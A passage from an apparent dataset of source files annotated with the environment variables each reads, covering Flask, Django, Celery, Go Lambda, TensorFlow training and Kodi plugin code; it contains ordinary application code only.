]
| []
| [
"OUT_DIR"
]
| [] | ["OUT_DIR"] | go | 1 | 0 | |
backend/thunder/__init__.py | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import os
app = Flask(__name__, static_url_path='', static_folder='../../front/src/')
app.config.from_object(os.environ['APP_SETTINGS'])
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
from thunder import views
| []
| []
| [
"APP_SETTINGS"
]
| [] | ["APP_SETTINGS"] | python | 1 | 0 | |
python/django/opendirectory_gui/manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "opendirectory_gui.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| []
| []
| []
| [] | [] | python | 0 | 0 | |
firstcontact/firstcontact/wsgi.py | """
WSGI config for firstcontact project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'firstcontact.settings')
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
tests/integration/conftest.py | import os
import pytest
from hcloud import Client
@pytest.fixture(autouse=True, scope='function')
def hetzner_client():
hetzner_client = Client(token="test-token", api_endpoint=os.getenv("FAKE_API_ENDPOINT", default="http://localhost:4000"))
return hetzner_client
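# Illustrative usage sketch (hypothetical test, kept un-collected by the
# leading underscore): pytest injects the fixture above by argument name, and
# the client already points at the fake API endpoint.
def _example_servers_smoke(hetzner_client):
    servers = hetzner_client.servers.get_all()
    assert isinstance(servers, list)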
| []
| []
| [
"FAKE_API_ENDPOINT"
]
| [] | ["FAKE_API_ENDPOINT"] | python | 1 | 0 | |
tools/omnissm/functions/register/main.go | // Copyright 2018 Capital One Services, LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"context"
"encoding/json"
"fmt"
"os"
"github.com/aws/aws-lambda-go/events"
"github.com/aws/aws-sdk-go/aws"
"github.com/capitalone/cloud-custodian/tools/omnissm/pkg/api"
"github.com/capitalone/cloud-custodian/tools/omnissm/pkg/apiutil"
"github.com/capitalone/cloud-custodian/tools/omnissm/pkg/identity"
"github.com/capitalone/cloud-custodian/tools/omnissm/pkg/manager"
)
var (
	// The DynamoDB table used for storing instance registrations.
RegistrationsTable = os.Getenv("OMNISSM_REGISTRATIONS_TABLE")
// The instance role used by the SSM agent
InstanceRole = os.Getenv("OMNISSM_INSTANCE_ROLE")
// The list of accounts authorized to use the register API
AccountWhitelist = os.Getenv("OMNISSM_ACCOUNT_WHITELIST")
mgr *manager.Manager
)
func init() {
mgr = manager.NewManager(&manager.Config{
Config: aws.NewConfig(),
RegistrationsTable: RegistrationsTable,
InstanceRole: InstanceRole,
})
}
func main() {
apiutil.Start(func(ctx context.Context, req events.APIGatewayProxyRequest) (*events.APIGatewayProxyResponse, error) {
whitelist := identity.NewWhitelist(AccountWhitelist)
r := api.RegistrationHandler{mgr}
switch req.Resource {
case "/register":
var registerReq api.RegistrationRequest
if err := json.Unmarshal([]byte(req.Body), ®isterReq); err != nil {
return nil, err
}
if err := registerReq.Verify(); err != nil {
return nil, err
}
if !whitelist.Exists(registerReq.Identity().AccountId) {
return nil, identity.ErrUnauthorizedAccount
}
switch req.HTTPMethod {
case "POST":
return apiutil.JSON(r.Create(ctx, ®isterReq))
case "PATCH":
return apiutil.JSON(r.Update(ctx, ®isterReq))
}
}
return nil, apiutil.NotFoundError{fmt.Sprintf("cannot find resource %#v", req.Resource)}
})
}
| [
"\"OMNISSM_REGISTRATIONS_TABLE\"",
"\"OMNISSM_INSTANCE_ROLE\"",
"\"OMNISSM_ACCOUNT_WHITELIST\""
]
| []
| [
"OMNISSM_ACCOUNT_WHITELIST",
"OMNISSM_INSTANCE_ROLE",
"OMNISSM_REGISTRATIONS_TABLE"
]
| [] | ["OMNISSM_ACCOUNT_WHITELIST", "OMNISSM_INSTANCE_ROLE", "OMNISSM_REGISTRATIONS_TABLE"] | go | 3 | 0 | |
lexpredict_openedgar/lexpredict_openedgar/taskapp/celery.py | """
MIT License
Copyright (c) 2018 ContraxSuite, LLC
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os
from celery import Celery
from django.apps import apps, AppConfig
from django.conf import settings
if not settings.configured:
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local') # pragma: no cover
app = Celery('lexpredict_openedgar')
class CeleryConfig(AppConfig):
name = 'lexpredict_openedgar.taskapp'
verbose_name = 'Celery Config'
def ready(self):
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
installed_apps = [app_config.name for app_config in apps.get_app_configs()]
app.autodiscover_tasks(lambda: installed_apps, force=True)
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) # pragma: no cover
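# Illustrative sketch (hypothetical task, not part of the original config): any
# @app.task defined in an installed app is registered through the
# autodiscovery performed in CeleryConfig.ready() above.
@app.task(bind=True)
def example_echo_task(self, message):
    """Return the message unchanged; handy for smoke-testing a worker."""
    return message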
| []
| []
| []
| [] | [] | python | 0 | 0 | |
other_train/train_loadCorrMat.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Binary for training Tensorflow models on the YouTube-8M dataset."""
import json
import os
import time
import eval_util
import export_model
import losses
import frame_level_models
import video_level_models
import readers
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow import app
from tensorflow import flags
from tensorflow import gfile
from tensorflow import logging
from tensorflow.python.client import device_lib
import utils
import numpy as np
FLAGS = flags.FLAGS
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
if __name__ == "__main__":
# Dataset flags.
flags.DEFINE_string("train_dir", "/tmp/yt8m_model/",
"The directory to save the model files in.")
flags.DEFINE_string(
"train_data_pattern", "",
"File glob for the training dataset. If the files refer to Frame Level "
"features (i.e. tensorflow.SequenceExample), then set --reader_type "
"format. The (Sequence)Examples are expected to have 'rgb' byte array "
"sequence feature as well as a 'labels' int64 context feature.")
flags.DEFINE_string("feature_names", "mean_rgb", "Name of the feature "
"to use for training.")
flags.DEFINE_string("feature_sizes", "1024", "Length of the feature vectors.")
# Model flags.
flags.DEFINE_bool(
"frame_features", False,
"If set, then --train_data_pattern must be frame-level features. "
"Otherwise, --train_data_pattern must be aggregated video-level "
"features. The model must also be set appropriately (i.e. to read 3D "
"batches VS 4D batches.")
flags.DEFINE_string(
"model", "LogisticModel",
"Which architecture to use for the model. Models are defined "
"in models.py.")
flags.DEFINE_bool(
"start_new_model", False,
"If set, this will not resume from a checkpoint and will instead create a"
" new model instance.")
# Training flags.
flags.DEFINE_integer("num_gpu", 1,
"The maximum number of GPU devices to use for training. "
"Flag only applies if GPUs are installed")
flags.DEFINE_integer("batch_size", 1024,
"How many examples to process per batch for training.")
flags.DEFINE_string("label_loss", "CrossEntropyLoss",
"Which loss function to use for training the model.")
flags.DEFINE_float(
"regularization_penalty", 1.0,
"How much weight to give to the regularization loss (the label loss has "
"a weight of 1).")
flags.DEFINE_float("base_learning_rate", 0.01,
"Which learning rate to start with.")
flags.DEFINE_float("learning_rate_decay", 0.95,
"Learning rate decay factor to be applied every "
"learning_rate_decay_examples.")
flags.DEFINE_float("learning_rate_decay_examples", 4000000,
"Multiply current learning rate by learning_rate_decay "
"every learning_rate_decay_examples.")
flags.DEFINE_integer("num_epochs", 5,
"How many passes to make over the dataset before "
"halting training.")
flags.DEFINE_integer("max_steps", None,
"The maximum number of iterations of the training loop.")
flags.DEFINE_integer("export_model_steps", 10000000000,
"The period, in number of steps, with which the model "
"is exported for batch prediction.")
flags.DEFINE_float("save_checkpoint_every_n_hour", 0.4,
"Save the checkpoint every n hours.")
flags.DEFINE_integer("validate_every_n_training_steps", 100,
"eval on training for every n steps")
# Other flags.
flags.DEFINE_integer("num_readers", 12,
"How many threads to use for reading input files.")
flags.DEFINE_string("optimizer", "AdamOptimizer",
"What optimizer class to use.")
flags.DEFINE_float("clip_gradient_norm", 1.0, "Norm to clip gradients to.")
flags.DEFINE_bool(
"log_device_placement", False,
"Whether to write the device on which every op will run into the "
"logs on startup.")
def validate_class_name(flag_value, category, modules, expected_superclass):
"""Checks that the given string matches a class of the expected type.
Args:
flag_value: A string naming the class to instantiate.
category: A string used further describe the class in error messages
(e.g. 'model', 'reader', 'loss').
modules: A list of modules to search for the given class.
expected_superclass: A class that the given class should inherit from.
Raises:
FlagsError: If the given class could not be found or if the first class
found with that name doesn't inherit from the expected superclass.
Returns:
True if a class was found that matches the given constraints.
"""
candidates = [getattr(module, flag_value, None) for module in modules]
for candidate in candidates:
if not candidate:
continue
if not issubclass(candidate, expected_superclass):
raise flags.FlagsError("%s '%s' doesn't inherit from %s." %
(category, flag_value,
expected_superclass.__name__))
return True
raise flags.FlagsError("Unable to find %s '%s'." % (category, flag_value))
def get_input_data_tensors(reader,
data_pattern,
batch_size=1000,
num_epochs=None,
num_readers=1):
"""Creates the section of the graph which reads the training data.
Args:
reader: A class which parses the training data.
data_pattern: A 'glob' style path to the data files.
batch_size: How many examples to process at a time.
num_epochs: How many passes to make over the training data. Set to 'None'
to run indefinitely.
num_readers: How many I/O threads to use.
Returns:
A tuple containing the features tensor, labels tensor, and optionally a
tensor containing the number of frames per video. The exact dimensions
depend on the reader being used.
Raises:
IOError: If no files matching the given pattern were found.
"""
logging.info("Using batch size of " + str(batch_size) + " for training.")
with tf.name_scope("train_input"):
files = gfile.Glob(data_pattern)
if not files:
raise IOError("Unable to find training files. data_pattern='" +
data_pattern + "'.")
logging.info("Number of training files: %s.", str(len(files)))
filename_queue = tf.train.string_input_producer(
files, num_epochs=num_epochs, shuffle=True)
training_data = [
reader.prepare_reader(filename_queue) for _ in range(num_readers)
]
return tf.train.shuffle_batch_join(
training_data,
batch_size=batch_size,
capacity=batch_size * 5,
min_after_dequeue=batch_size,
allow_smaller_final_batch=True,
enqueue_many=True)
def find_class_by_name(name, modules):
"""Searches the provided modules for the named class and returns it."""
modules = [getattr(module, name, None) for module in modules]
return next(a for a in modules if a)
def build_graph(reader,
model,
train_data_pattern,
label_loss_fn=losses.CrossEntropyLoss(),
batch_size=1000,
base_learning_rate=0.01,
learning_rate_decay_examples=1000000,
learning_rate_decay=0.95,
optimizer_class=tf.train.AdamOptimizer,
clip_gradient_norm=1.0,
regularization_penalty=1,
num_readers=1,
num_epochs=None,
corr_mat=None):
"""Creates the Tensorflow graph.
This will only be called once in the life of
a training model, because after the graph is created the model will be
restored from a meta graph file rather than being recreated.
Args:
reader: The data file reader. It should inherit from BaseReader.
model: The core model (e.g. logistic or neural net). It should inherit
from BaseModel.
train_data_pattern: glob path to the training data files.
label_loss_fn: What kind of loss to apply to the model. It should inherit
from BaseLoss.
batch_size: How many examples to process at a time.
base_learning_rate: What learning rate to initialize the optimizer with.
optimizer_class: Which optimization algorithm to use.
clip_gradient_norm: Magnitude of the gradient to clip to.
regularization_penalty: How much weight to give the regularization loss
compared to the label loss.
num_readers: How many threads to use for I/O operations.
num_epochs: How many passes to make over the data. 'None' means an
unlimited number of passes.
"""
global_step = tf.Variable(0, trainable=False, name="global_step")
local_device_protos = device_lib.list_local_devices()
gpus = [x.name for x in local_device_protos if x.device_type == 'GPU']
gpus = gpus[:FLAGS.num_gpu]
num_gpus = len(gpus)
if num_gpus > 0:
logging.info("Using the following GPUs to train: " + str(gpus))
num_towers = num_gpus
device_string = '/gpu:%d'
else:
logging.info("No GPUs found. Training on CPU.")
num_towers = 1
device_string = '/cpu:%d'
learning_rate = tf.train.exponential_decay(
base_learning_rate,
global_step * batch_size * num_towers,
learning_rate_decay_examples,
learning_rate_decay,
staircase=True)
tf.summary.scalar('learning_rate', learning_rate)
optimizer = optimizer_class(learning_rate)
unused_video_id, model_input_raw, labels_batch, num_frames = (
get_input_data_tensors(
reader,
train_data_pattern,
batch_size=batch_size * num_towers,
num_readers=num_readers,
num_epochs=num_epochs))
tf.summary.histogram("model/input_raw", model_input_raw)
feature_dim = len(model_input_raw.get_shape()) - 1
model_input = tf.nn.l2_normalize(model_input_raw, feature_dim)
tower_inputs = tf.split(model_input, num_towers)
tower_labels = tf.split(labels_batch, num_towers)
tower_num_frames = tf.split(num_frames, num_towers)
tower_gradients = []
tower_predictions = []
tower_label_losses = []
tower_reg_losses = []
for i in range(num_towers):
# For some reason these 'with' statements can't be combined onto the same
# line. They have to be nested.
with tf.device(device_string % i):
with (tf.variable_scope(("tower"), reuse=True if i > 0 else None)):
with (slim.arg_scope([slim.model_variable, slim.variable], device="/cpu:0" if num_gpus!=1 else "/gpu:0")):
result = model.create_model(
tower_inputs[i],
num_frames=tower_num_frames[i],
vocab_size=reader.num_classes,
corr_mat_init=corr_mat,
labels=tower_labels[i])
for variable in slim.get_model_variables():
tf.summary.histogram(variable.op.name, variable)
predictions0 = result["predictions0"]
predictions = result["predictions"]
tower_predictions.append(predictions)
label_loss = label_loss_fn.calculate_loss(predictions0, tower_labels[i])
if "regularization_loss" in result.keys():
reg_loss = result["regularization_loss"]
else:
reg_loss = tf.constant(0.0)
reg_losses = tf.losses.get_regularization_losses()
if reg_losses:
reg_loss += tf.add_n(reg_losses)
tower_reg_losses.append(reg_loss)
# Adds update_ops (e.g., moving average updates in batch normalization) as
# a dependency to the train_op.
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
if "update_ops" in result.keys():
update_ops += result["update_ops"]
if update_ops:
with tf.control_dependencies(update_ops):
barrier = tf.no_op(name="gradient_barrier")
with tf.control_dependencies([barrier]):
label_loss = tf.identity(label_loss)
tower_label_losses.append(label_loss)
# Incorporate the L2 weight penalties etc.
final_loss = regularization_penalty * reg_loss + label_loss
gradients = optimizer.compute_gradients(final_loss,
colocate_gradients_with_ops=False)
tower_gradients.append(gradients)
label_loss = tf.reduce_mean(tf.stack(tower_label_losses))
tf.summary.scalar("label_loss", label_loss)
if regularization_penalty != 0:
reg_loss = tf.reduce_mean(tf.stack(tower_reg_losses))
tf.summary.scalar("reg_loss", reg_loss)
merged_gradients = utils.combine_gradients(tower_gradients)
if clip_gradient_norm > 0:
with tf.name_scope('clip_grads'):
merged_gradients = utils.clip_gradient_norms(merged_gradients, clip_gradient_norm)
train_op = optimizer.apply_gradients(merged_gradients, global_step=global_step)
tf.add_to_collection("global_step", global_step)
tf.add_to_collection("loss", label_loss)
tf.add_to_collection("predictions", tf.concat(tower_predictions, 0))
tf.add_to_collection("input_batch_raw", model_input_raw)
tf.add_to_collection("input_batch", model_input)
tf.add_to_collection("num_frames", num_frames)
tf.add_to_collection("labels", tf.cast(labels_batch, tf.float32))
tf.add_to_collection("train_op", train_op)
class Trainer(object):
"""A Trainer to train a Tensorflow graph."""
def __init__(self, cluster, task, train_dir, model, reader, model_exporter,
log_device_placement=True, max_steps=None,
export_model_steps=1000, corr_mat = None):
""""Creates a Trainer.
Args:
cluster: A tf.train.ClusterSpec if the execution is distributed.
None otherwise.
task: A TaskSpec describing the job type and the task index.
"""
self.cluster = cluster
self.task = task
self.is_master = (task.type == "master" and task.index == 0)
self.train_dir = train_dir
self.config = tf.ConfigProto(
allow_soft_placement=True,log_device_placement=log_device_placement)
self.model = model
self.reader = reader
self.model_exporter = model_exporter
self.max_steps = max_steps
self.max_steps_reached = False
self.export_model_steps = export_model_steps
self.last_model_export_step = 0
self.corr_mat = corr_mat
# if self.is_master and self.task.index > 0:
# raise StandardError("%s: Only one replica of master expected",
# task_as_string(self.task))
def run(self, start_new_model=False):
"""Performs training on the currently defined Tensorflow graph.
Returns:
A tuple of the training Hit@1 and the training PERR.
"""
if self.is_master and start_new_model:
self.remove_training_directory(self.train_dir)
if not os.path.exists(self.train_dir):
os.makedirs(self.train_dir)
model_flags_dict = {
"model": FLAGS.model,
"feature_sizes": FLAGS.feature_sizes,
"feature_names": FLAGS.feature_names,
"frame_features": FLAGS.frame_features,
"label_loss": FLAGS.label_loss,
}
flags_json_path = os.path.join(FLAGS.train_dir, "model_flags.json")
if os.path.exists(flags_json_path):
existing_flags = json.load(open(flags_json_path))
if existing_flags != model_flags_dict:
logging.error("Model flags do not match existing file %s. Please "
"delete the file, change --train_dir, or pass flag "
"--start_new_model",
flags_json_path)
logging.error("Ran model with flags: %s", str(model_flags_dict))
logging.error("Previously ran with flags: %s", str(existing_flags))
exit(1)
else:
# Write the file.
with open(flags_json_path, "w") as fout:
fout.write(json.dumps(model_flags_dict))
target, device_fn = self.start_server_if_distributed()
meta_filename = self.get_meta_filename(start_new_model, self.train_dir)
with tf.Graph().as_default() as graph:
if meta_filename:
saver = self.recover_model(meta_filename)
with tf.device(device_fn):
if not meta_filename:
saver = self.build_model(self.model, self.reader, self.corr_mat)
global_step = tf.get_collection("global_step")[0]
loss = tf.get_collection("loss")[0]
predictions = tf.get_collection("predictions")[0]
labels = tf.get_collection("labels")[0]
train_op = tf.get_collection("train_op")[0]
init_op = tf.global_variables_initializer()
sv = tf.train.Supervisor(
graph,
logdir=self.train_dir,
init_op=init_op,
is_chief=self.is_master,
global_step=global_step,
#save_model_secs=15 * 60,
save_model_secs=int(FLAGS.save_checkpoint_every_n_hour * 3600),
#save_summaries_secs=120,
save_summaries_secs=int(FLAGS.save_checkpoint_every_n_hour * 3600),
saver=saver)
logging.info("%s: Starting managed session.", task_as_string(self.task))
with sv.managed_session(target, config=self.config) as sess:
try:
logging.info("%s: Entering training loop.", task_as_string(self.task))
while (not sv.should_stop()) and (not self.max_steps_reached):
batch_start_time = time.time()
_, global_step_val, loss_val, predictions_val, labels_val = sess.run(
[train_op, global_step, loss, predictions, labels])
seconds_per_batch = time.time() - batch_start_time
examples_per_second = labels_val.shape[0] / seconds_per_batch
if self.max_steps and self.max_steps <= global_step_val:
self.max_steps_reached = True
#if self.is_master and global_step_val % 10 == 0 and self.train_dir:
if self.is_master and global_step_val % FLAGS.validate_every_n_training_steps == 0 and self.train_dir:
eval_start_time = time.time()
hit_at_one = eval_util.calculate_hit_at_one(predictions_val, labels_val)
perr = eval_util.calculate_precision_at_equal_recall_rate(predictions_val,
labels_val)
gap = eval_util.calculate_gap(predictions_val, labels_val)
eval_end_time = time.time()
eval_time = eval_end_time - eval_start_time
logging.info("training step " + str(global_step_val) + " | Loss: " + ("%.2f" % loss_val) +
" Examples/sec: " + ("%.2f" % examples_per_second) + " | Hit@1: " +
("%.2f" % hit_at_one) + " PERR: " + ("%.2f" % perr) +
" GAP: " + ("%.2f" % gap))
sv.summary_writer.add_summary(
utils.MakeSummary("model/Training_Hit@1", hit_at_one),
global_step_val)
sv.summary_writer.add_summary(
utils.MakeSummary("model/Training_Perr", perr), global_step_val)
sv.summary_writer.add_summary(
utils.MakeSummary("model/Training_GAP", gap), global_step_val)
sv.summary_writer.add_summary(
utils.MakeSummary("global_step/Examples/Second",
examples_per_second), global_step_val)
sv.summary_writer.flush()
with open(FLAGS.train_dir + '/global_step_{%d}_training_GAP_{%.6f}.txt' % (global_step_val, gap), 'w') as f:
f.write('\n')
# Exporting the model every x steps
time_to_export = ((self.last_model_export_step == 0) or
(global_step_val - self.last_model_export_step
>= self.export_model_steps))
if self.is_master and time_to_export:
self.export_model(global_step_val, sv.saver, sv.save_path, sess)
self.last_model_export_step = global_step_val
else:
#logging.info("training step " + str(global_step_val) + " | Loss: " +
#("%.2f" % loss_val) + " Examples/sec: " + ("%.2f" % examples_per_second))
continue
except tf.errors.OutOfRangeError:
logging.info("%s: Done training -- epoch limit reached.",
task_as_string(self.task))
logging.info("%s: Exited training loop.", task_as_string(self.task))
sv.Stop()
def export_model(self, global_step_val, saver, save_path, session):
# If the model has already been exported at this step, return.
if global_step_val == self.last_model_export_step:
return
last_checkpoint = saver.save(session, save_path, global_step_val)
model_dir = "{0}/export/step_{1}".format(self.train_dir, global_step_val)
logging.info("%s: Exporting the model at step %s to %s.",
task_as_string(self.task), global_step_val, model_dir)
self.model_exporter.export_model(
model_dir=model_dir,
global_step_val=global_step_val,
last_checkpoint=last_checkpoint)
def start_server_if_distributed(self):
"""Starts a server if the execution is distributed."""
if self.cluster:
logging.info("%s: Starting trainer within cluster %s.",
task_as_string(self.task), self.cluster.as_dict())
server = start_server(self.cluster, self.task)
target = server.target
device_fn = tf.train.replica_device_setter(
ps_device="/job:ps",
worker_device="/job:%s/task:%d" % (self.task.type, self.task.index),
cluster=self.cluster)
else:
target = ""
device_fn = ""
return (target, device_fn)
def remove_training_directory(self, train_dir):
"""Removes the training directory."""
try:
logging.info(
"%s: Removing existing train directory.",
task_as_string(self.task))
gfile.DeleteRecursively(train_dir)
except:
logging.error(
"%s: Failed to delete directory " + train_dir +
" when starting a new model. Please delete it manually and" +
" try again.", task_as_string(self.task))
def get_meta_filename(self, start_new_model, train_dir):
if start_new_model:
logging.info("%s: Flag 'start_new_model' is set. Building a new model.",
task_as_string(self.task))
return None
latest_checkpoint = tf.train.latest_checkpoint(train_dir)
if not latest_checkpoint:
logging.info("%s: No checkpoint file found. Building a new model.",
task_as_string(self.task))
return None
meta_filename = latest_checkpoint + ".meta"
if not gfile.Exists(meta_filename):
logging.info("%s: No meta graph file found. Building a new model.",
task_as_string(self.task))
return None
else:
return meta_filename
def recover_model(self, meta_filename):
logging.info("%s: Restoring from meta graph file %s",
task_as_string(self.task), meta_filename)
return tf.train.import_meta_graph(meta_filename)
def build_model(self, model, reader, corr_mat = None):
"""Find the model and build the graph."""
label_loss_fn = find_class_by_name(FLAGS.label_loss, [losses])()
optimizer_class = find_class_by_name(FLAGS.optimizer, [tf.train])
build_graph(reader=reader,
model=model,
optimizer_class=optimizer_class,
clip_gradient_norm=FLAGS.clip_gradient_norm,
train_data_pattern=FLAGS.train_data_pattern,
label_loss_fn=label_loss_fn,
base_learning_rate=FLAGS.base_learning_rate,
learning_rate_decay=FLAGS.learning_rate_decay,
learning_rate_decay_examples=FLAGS.learning_rate_decay_examples,
regularization_penalty=FLAGS.regularization_penalty,
num_readers=FLAGS.num_readers,
batch_size=FLAGS.batch_size,
num_epochs=FLAGS.num_epochs,
corr_mat = corr_mat)
return tf.train.Saver(max_to_keep=0, keep_checkpoint_every_n_hours=FLAGS.save_checkpoint_every_n_hour)
def get_reader():
# Convert feature_names and feature_sizes to lists of values.
feature_names, feature_sizes = utils.GetListOfFeatureNamesAndSizes(
FLAGS.feature_names, FLAGS.feature_sizes)
if FLAGS.frame_features:
reader = readers.YT8MFrameFeatureReader(
feature_names=feature_names, feature_sizes=feature_sizes)
else:
reader = readers.YT8MAggregatedFeatureReader(
feature_names=feature_names, feature_sizes=feature_sizes)
return reader
class ParameterServer(object):
"""A parameter server to serve variables in a distributed execution."""
def __init__(self, cluster, task):
"""Creates a ParameterServer.
Args:
cluster: A tf.train.ClusterSpec if the execution is distributed.
None otherwise.
task: A TaskSpec describing the job type and the task index.
"""
self.cluster = cluster
self.task = task
def run(self):
"""Starts the parameter server."""
logging.info("%s: Starting parameter server within cluster %s.",
task_as_string(self.task), self.cluster.as_dict())
server = start_server(self.cluster, self.task)
server.join()
def start_server(cluster, task):
"""Creates a Server.
Args:
cluster: A tf.train.ClusterSpec if the execution is distributed.
None otherwise.
task: A TaskSpec describing the job type and the task index.
"""
if not task.type:
raise ValueError("%s: The task type must be specified." %
task_as_string(task))
if task.index is None:
raise ValueError("%s: The task index must be specified." %
task_as_string(task))
# Create and start a server.
return tf.train.Server(
tf.train.ClusterSpec(cluster),
protocol="grpc",
job_name=task.type,
task_index=task.index)
def task_as_string(task):
return "/job:%s/task:%s" % (task.type, task.index)
def main(unused_argv):
# Load the environment.
env = json.loads(os.environ.get("TF_CONFIG", "{}"))
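  # Illustrative sketch of the assumed TF_CONFIG layout for a distributed run
  # (hostnames and ports below are hypothetical):
  #   {"cluster": {"master": ["host0:2222"], "worker": ["host1:2222"],
  #                "ps": ["host2:2222"]},
  #    "task": {"type": "worker", "index": 0}}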
# Load the cluster data from the environment.
cluster_data = env.get("cluster", None)
cluster = tf.train.ClusterSpec(cluster_data) if cluster_data else None
# Load the task data from the environment.
task_data = env.get("task", None) or {"type": "master", "index": 0}
task = type("TaskSpec", (object,), task_data)
# Logging the version.
logging.set_verbosity(tf.logging.INFO)
logging.info("%s: Tensorflow version: %s.",
task_as_string(task), tf.__version__)
# Dispatch to a master, a worker, or a parameter server.
if not cluster or task.type == "master" or task.type == "worker":
model = find_class_by_name(FLAGS.model,
[frame_level_models, video_level_models])()
reader = get_reader()
model_exporter = export_model.ModelExporter(
frame_features=FLAGS.frame_features,
model=model,
reader=reader)
mat_dir = '/home/weimin/yt8m/code/youtube-8m/'
with open(mat_dir + 'corr_mat.npz', 'rb') as f:
corr_mat = np.load(f)
Trainer(cluster, task, FLAGS.train_dir, model, reader, model_exporter,
FLAGS.log_device_placement, FLAGS.max_steps,
FLAGS.export_model_steps, corr_mat).run(start_new_model=FLAGS.start_new_model)
elif task.type == "ps":
ParameterServer(cluster, task).run()
else:
raise ValueError("%s: Invalid task_type: %s." %
(task_as_string(task), task.type))
if __name__ == "__main__":
app.run()
| []
| []
| [
"TF_CONFIG",
"TF_CPP_MIN_LOG_LEVEL"
]
| [] | ["TF_CONFIG", "TF_CPP_MIN_LOG_LEVEL"] | python | 2 | 0 | |
plugin.video.mrknow/lib/customReplacements.py | # -*- coding: utf-8 -*-
import os.path
import re
from string import lower
import common
import utils.fileUtils as fu
from utils.regexUtils import findall
class CustomReplacements(object):
def __init__(self):
self.simpleScheme = {'(@PLATFORM@)': os.environ.get('OS'),
'(@CURRENT_URL@)': fu.getFileContent(os.path.join(common.Paths.cacheDir, 'lasturl')),
'(@LANGUAGE@)': self.languageShortName(common.language)
}
self.complexScheme = { 'import': '(#*@IMPORT=([^@]+)@)',
'find': '(#*@FIND\(.*?\)@)',
'catch': '(#*@CATCH\([^\)]+\)@)'
}
def languageShortName(self, longName):
if str(longName).lower() == 'german':
return 'de'
else:
return 'en'
def regex(self, item):
return self.complexScheme.get(item)
def __replaceImports(self, pathToImports, data):
while True:
m_reg = findall(data, self.regex('import'))
if len(m_reg) > 0:
for idat in m_reg:
if idat[0].startswith('#'):
data = data.replace(idat[0],'')
continue
filename = idat[1]
pathImp = os.path.join(common.Paths.modulesDir, filename)
if not os.path.exists(pathImp):
pathImp = os.path.join(pathToImports, filename)
if not (os.path.exists(pathImp)):
common.log('Skipped Import: ' + filename)
continue
dataImp = fu.getFileContent(pathImp)
dataImp = dataImp.replace('\r\n','\n')
data = data.replace(idat[0], dataImp)
else:
break
return data
def __replaceParameters(self, data, params=[]):
i=1
for par in params:
matches = findall(data,'(@PARAM' + str(i) + '@)')
if matches:
for m in matches:
ptemp = str(par).strip()
data = data.replace(m, ptemp)
i = i + 1
return data
def __replaceFinders(self, data):
m_reg = findall(data, self.regex('find'))
if len(m_reg) > 0:
for idat in m_reg:
if idat.startswith('#'):
continue
ps = idat[6:-2].strip().split(',')
method = ps[0].strip("'")
param1 = ps[1].strip("'")
param2 = ps[2].strip("'")
param3 = ps[3].strip("'")
if method == 'JS1':
jsName = param1
idName = param2
varName = param3
regex = "(?:java)?scr(?:'\+')?ipt[^<]+" + idName + "\s*=\s*[\"']([^\"']+)[\"'][^<]*</scr(?:'\+')?ipt\s*>[^<]*<scr(?:'\+')?ipt[^<]*src=[\"']" + jsName + "[\"']"
lines = "item_infos=" + regex + "\nitem_order=" + varName
data = data.replace(idat, lines)
return data
def __replaceCatchers(self, data):
m_reg = findall(data, self.regex('catch'))
if not (m_reg is None or len(m_reg) == 0):
for idat in m_reg:
if idat.startswith('#'):
continue
ps = idat[7:-2].strip().split(',')
catcherName = ps.pop(0).strip()
# import catcher file and insert parameters
pathImp = os.path.join(common.Paths.catchersDir, catcherName + '.txt')
if not (os.path.exists(pathImp)):
